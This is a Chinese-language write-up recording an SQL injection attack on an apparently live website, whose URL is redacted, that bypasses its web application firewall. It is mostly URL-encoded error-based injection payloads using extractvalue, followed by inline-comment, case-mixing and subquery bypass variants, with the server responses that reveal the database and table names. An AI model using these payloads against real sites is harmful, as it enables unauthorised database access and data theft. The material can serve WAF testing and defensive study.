一次SQL注入WAF绕过记录

1.渗透目标

https://[某站点]/new.php?id=

2.绕WAF

闭合方式判断

?id=1' --+ 
//报错为 '''  -> --+被过滤

用以下方式都可以过
?id=1' or '1'='1
?id=1' and '1'='1
?id=1' || '1'='1

报错注入注库名

?id=1%27%20||%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))%20||%20%271%27=%271
//XPATH syntax error: '~iibnbnet_unidatabase~'

报错注入注表名

?id=1%27%20||%20extractvalue(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27iibnbnet_unidatabase%27%20limit%200,1),0x7e))%20||%20%271%27=%271
//无内容返回，语句整体为真 -> 查表名语句被过滤

内联注释
1%27%20||%20extractvalue(1,concat(0x7e,(/*!select*/%20/*!table_name*/%20/*!from*/%20/*!information_schema.tables*/%20/*!where*/%20/*!table_schema=%27iibnbnet_unidatabase%27*/%20/*!limit%200,1*/),0x7e))%20||%20%271%27=%271
//无内容返回，语句整体为真 

大小写绕过
id=1%27%20||%20extractvalue(1,concat(0x7e,(/*!sElect*/%20/*!table_name*/%20/*!from*/%20/*!information_schema.tables*/%20/*!wHere*/%20/*!table_schema=%27iibnbnet_unidatabase%27*/%20/*!limit%200,1*/),0x7e))%20||%20%271%27=%271
//无内容返回，语句整体为真

hex编码绕过
//无返回内容，语句整体为真

想到了第一步的\可以爆出前后语句从而判断是否有语句被过滤，但是把查语句一个一个带进去后发现所有单独的词都没被过滤，判断是组合语句过滤

对语句做内联注释
?id=1%27%20||%20/*!extractvalue(1,concat(0x7e,(/*!sElect*/%20/*!table_name*/%20/*!from*/%20/*!information_schema.tables*/%20/*!wHere*/%20/*!table_schema=%27iibnbnet_unidatabase%27*/%20/*!limit%200,1*/),0x7e))*/%20||%20%271%27=%271
//You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/ || '1'='1'' at line 1
//有可能)+*被过滤，最后的注释符没起作用

将最后的注释符位置改到最后
?id=1%27%20||%20/*!extractvalue(1,concat(0x7e,(/*!sElect*/%20/*!table_name*/%20/*!from*/%20/*!information_schema.tables*/%20/*!wHere*/%20/*!table_schema=%27iibnbnet_unidatabase%27*/%20/*!limit%200,1*/),0x7e))%20||%20%271%27=%271*/
//成功取出表名
//XPATH syntax error: '~uni_albumlist~'

//把/*!位置往前放也可以绕过
?id=1/*!%27%20||%20extractvalue(1,concat(0x7e,(/*!sElect*/%20/*!table_name*/%20/*!from*/%20/*!information_schema.tables*/%20/*!wHere*/%20/*!table_schema=%27iibnbnet_unidatabase%27*/%20/*!limit%200,1*/),0x7e))%20||%20%271%27=%271*/
//XPATH syntax error: '~uni_albumlist~'

用子查询也可绕过waf

?id=1=(SELECT%201%20FROM%20dual%20WHERE%201%27%20||extractvalue(1,concat(0x7e,(/*!select*/%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20like%20%27iibnbnet_unidatabase%27),0x7e))||%20%271%27=%271)
//where之后的即是我们原来的payload

后续列名与表信息采用相同方法可以绕过waf。